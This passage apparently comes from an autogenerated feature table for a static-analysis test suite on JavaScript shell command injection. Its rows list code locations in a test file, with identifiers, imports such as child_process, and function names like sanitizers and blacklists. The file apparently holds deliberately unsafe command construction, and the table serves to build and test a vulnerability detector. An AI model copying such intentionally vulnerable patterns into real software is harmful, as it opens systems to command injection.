last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | exceptional return of arr.push(last) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | exceptional return of arr.push(last) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | exceptional return of arr.push(last) | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | exceptional return of arr.push(last) | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | exceptional return of arr.push(last) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:14:436:17 | push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:14:436:17 | push | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:14:436:17 | push | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:14:436:17 | push | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:14:436:17 | push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | CalleeFlexibleAccessPath | arr.push | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:19:436:22 | last | receiverName | arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:437:9:437:11 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:437:9:437:11 | arr | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:437:9:437:11 | arr | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:437:9:437:11 | arr | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:437:9:437:11 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:13 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:13 | asyncExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:13 | asyncExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:13 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:40 | asyncEx ... ecute") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:40 | asyncEx ... ecute") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:40 | asyncEx ... ecute") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:40 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:40 | asyncExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:5:440:40 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:23 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:23 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | exceptional return of require ... ecute") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | exceptional return of require ... ecute") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | exceptional return of require ... ecute") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | require ... ecute") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | require ... ecute") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | require ... ecute") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:25:440:39 | "async-execute" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:25:440:39 | "async-execute" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:25:440:39 | "async-execute" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:25:440:39 | "async-execute" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:25:440:39 | "async-execute" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:25:440:39 | "async-execute" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:25 | module. ... ncStuff | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:25 | module. ... ncStuff | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:441:25 | module. ... ncStuff | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:443:1 | module. ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:443:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:1:443:1 | module. ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:8:441:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:8:441:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:8:441:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs 